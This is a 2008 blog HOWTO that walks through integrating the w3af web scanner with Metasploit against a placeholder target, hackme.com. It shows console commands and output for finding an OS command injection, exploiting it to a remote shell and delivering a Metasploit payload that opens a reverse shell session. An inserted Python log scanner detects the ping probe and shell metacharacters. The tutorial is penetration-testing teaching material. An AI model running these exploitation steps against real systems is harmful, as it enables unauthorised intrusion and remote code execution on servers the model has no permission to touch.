Friday, 19 December 2008

HOWTO-Integrate w3af with Metasploit

Objective: Learn how to use the advanced exploitation techniques of the w3af framework.
Summary: This HOWTO explains how to execute Metasploit payloads and exploits from the w3af console using the virtual daemon.
Required w3af version: This HOWTO applies to w3af versions beta5 and greater.
Steps
First of all, please read the user's guide; this series of HOWTO documents doesn't replace the documentation, which gives a much more general knowledge of the framework and its features. With that said, let's start with the steps you have to follow for advanced exploitation:

Note: To use this feature you must have the Metasploit Framework version 3.0 or higher installed; it is available for free from the official site, www.metasploit.com. Installation and configuration of MSF is not in the scope of this HOWTO.
• STEP1 - To use the virtual daemon, it is necessary to run the tool with the following parameter:
# ./w3af -i /home/user/workspace/msf/
Successfully installed Virtual Daemon.
w3af>>>
It is important to mention that the path "/home/user/workspace/msf/" is the directory where you installed the MSF.
The output above shows w3af running with the virtual daemon installed.
• STEP2 - Use the discovery plugins to try to identify the various injection points. In this example we will use the following:
w3af>>>plugins discovery allowedMethods webSpider
w3af>>>target set target http://www.hackme.com/
w3af>>>start
The following is a list of that were found by the webSpider plugin:
- http://www.hackme.com/dina2.jpg [ http://www.hackme.com/ ]
- http://www.hackme.com/tg.gif [ http://www.hackme.com/ ]
- http://www.hackme.com/pagead/show_ads.js [ http://www.hackme.com/ ]
- http://www.hackme.com/stats.asp [ http://www.hackme.com/ ]
- http://www.hackme.com/urchin.js [ http://www.hackme.com/ ]
- http://www.hackme.com/pub/shockwave/cabs/flash/swflash.cab [ http://www.hackme.com/ ]
- http://www.hackme.com/poetry/bienvenue.php [ http://www.hackme.com/ ]
- http://www.hackme.com/js/counter.js [ http://www.hackme.com/ ]
- http://www.hackme.com/loose.dtd [ http://www.hackme.com/ ]
Found 3 URLs and 3 different points of injection.
The list of URLs is:
- http://www.hackme.com/
- http://www.hackme.com/index.php?ir=results.php&page=1
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php
The list of fuzzable requests is:
- http://www.hackme.com/ | Method: GET
- http://www.hackme.com/index.php?ir=results.php&page=1 | Method: POST | Parameters: (search)
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php | Method: POST | Parameters: (autor)
w3af>>>
As a result we have discovered some URLs, which could contain vulnerabilities. A special case is the "index.php" file which has the query string parameter "page". Let's see how ...
• STEP3 - Activate the osCommanding audit plugin and set the target URL to http://www.hackme.com/index.php?ir=result.php&page=hack%%
w3af>>>target set target http://www.hackme.com/index.php?ir=result.php&page=hack%%
w3af>>>plugins audit osCommanding
w3af>>>start
Found 3 URLs and 3 different points of injection.
The list of URLs is:
- http://www.hackme.com/index.php
- http://www.hackme.com/index.php?ir=results.php&page=1
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php
The list of fuzzable requests is:
- http://www.hackme.com/index.php | Method: GET | Parameters: (ir,page)
- http://www.hackme.com/index.php?ir=results.php&page=1 | Method: POST | Parameters: (search)
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php | Method: POST | Parameters: (autor)
Starting osCommanding plugin execution.
100% [====================================================] 3/3
A possible OS Commanding was found at: http://www.hackme.com/index.php . Using method: GET. The data sent was: ir=run+ping+-n+3+localhost&page=hack%% . Please review manually. This information was found in the request with id 58.
By changing the value received through the URL (page=hack%%) in ways the application does not expect, we can see that the web application is not properly validating the value.
Knowing this, we can take control of the application and execute arbitrary code, including a file hosted on another server.
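From the defender's side, the probe reported above (ir=run+ping+-n+3+localhost) leaves a recognizable trace in the web server's access log. The following Python code is an added example, not part of the original HOWTO or of w3af; the log lines, the function names and the "ping -c" variant are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the original page); the second one
# carries the probe data reported by the osCommanding plugin in STEP3.
SAMPLE_LOG = [
    '172.16.1.10 - - [28/May/2008:17:41:02 +0000] "GET /index.php?ir=results.php&page=1 HTTP/1.1" 200 5120',
    '172.16.1.10 - - [28/May/2008:17:41:09 +0000] "GET /index.php?ir=run+ping+-n+3+localhost&page=hack%% HTTP/1.1" 200 5342',
    '172.16.1.10 - - [28/May/2008:17:41:10 +0000] "GET /index.php?ir=ping+-c+3+localhost&page=1 HTTP/1.1" 200 5391',
    '172.16.1.77 - - [28/May/2008:17:42:30 +0000] "GET /search.php?q=ping+pong+rules HTTP/1.1" 200 812',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# "ping" with a count flag (-n on Windows, -c on Unix) and a host: a timing probe.
PING_PROBE = re.compile(r'\bping\s+-[nc]\s+\d+\s+\S+', re.IGNORECASE)
# Shell metacharacters that have no business in a page/file selector parameter.
SHELL_META = re.compile(r'[;|`]|\$\(|&&')

def suspicious_params(url):
    """Return [(param, reason)] for decoded query values that look like command probes."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if PING_PROBE.search(value):
            hits.append((name, "ping-timing-probe"))
        elif SHELL_META.search(value):
            hits.append((name, "shell-metacharacter"))
    return hits

def scan(lines):
    """Parse access-log lines and return one finding per suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, url, status = m.groups()
        for param, reason in suspicious_params(url):
            findings.append({"client": client, "path": urlsplit(url).path,
                             "param": param, "reason": reason, "status": int(status)})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded value rather than the raw query string is what lets the "+"-encoded probe be recognized while the ordinary search for "ping pong rules" is left alone.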
• STEP4 - Exploit the identified vulnerability using the exploit plugins.
w3af>>>exploit exploit *
Using plugin: osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited
No [blind] sql injection vulnerabilities have been found.
Hint #1: Try to find vulnerabilities using the audit plugins.
Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.
Using plugin: googleProxy
google proxy listening on 127.0.0.1:44446
Vulnerability successfully exploited.
This is a list of available shells:
- [0]
- [1]
Please use the interact command to interact with the shell objects.
w3af>>>
We get a list of available shells. With the interact command we can select the shell in which to run commands.
w3af/exploit>>> interact 1
Execute "endInteraction" to get out of the remote shell. Commands typed in
this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell-1>>> whoami
www-data
w3af>>>

• STEP5 - Launch the virtual daemon and integrate Metasploit.
w3af/exploit/osCommandingShell-1>>> start vdaemon
Virtual daemon service is running on port 9091, use metasploit's w3af_vdaemon module to exploit it.
w3af/exploit/osCommandingShell-1>>>

• STEP6 - Start the Metasploit Framework Web Console and configure the w3af virtual daemon exploit.
root@nb:/home/user/workspace/mfs# ./msfweb

[*] Starting msfweb v3.2-release on http://127.0.0.1:55555/

=> Booting WEBrick...
[*] WEBrick directory traversal patch loaded
=> Rails application started on http://127.0.0.1:55555
=> Ctrl-C to shutdown server; call with --help for options
[2008-05-28 17:50:13] INFO WEBrick 1.3.1
[2008-05-28 17:50:13] INFO ruby 1.8.6 (2007-06-07) [i486-linux]
[2008-05-28 17:50:13] INFO WEBrick::HTTPServer#start: pid=11541 port=55555
Once the service is up, open the browser and go to the address and port on which msf is listening, http://localhost:55555.
After clicking on "Exploit" in the main menu, you'll see a small window where we can search for the name of the exploit (w3af) and select it, as shown in the following picture.


We select the operating system and the payload to run. At this stage we must indicate certain parameters: RHOST (IP address to attack), LHOST (public IP address), LPORT (port which it will use to connect).


After completing the parameters, we can run it by clicking on Launch Exploit. A window shows the process in detail. If it is successful, we get an operating system shell.



And get shell !!!
[*] Started reverse handler
[*] The remote ip address is: 172.16.1.128
[*] Using remote IP address to create payloads.
[*] Sent payload to vdaemon.
[*] The estimated time to wait for the extrusion scan to complete is: 1 seconds.
[*] Done waiting!
[*] The estimated time to wait for PE/ELF transfer is: 8 seconds.
[*] Waiting...
[*] Done waiting!
[*] Going to wait for 27 seconds (waiting for crontab/at to execute payload).
[*] The session could start before the handler, so please *be patient*.
[*] Command shell session 1 opened (172.16.1.10:4444) -> 172.16.1.128:1047)
[*] Done waiting!
[*] Starting handler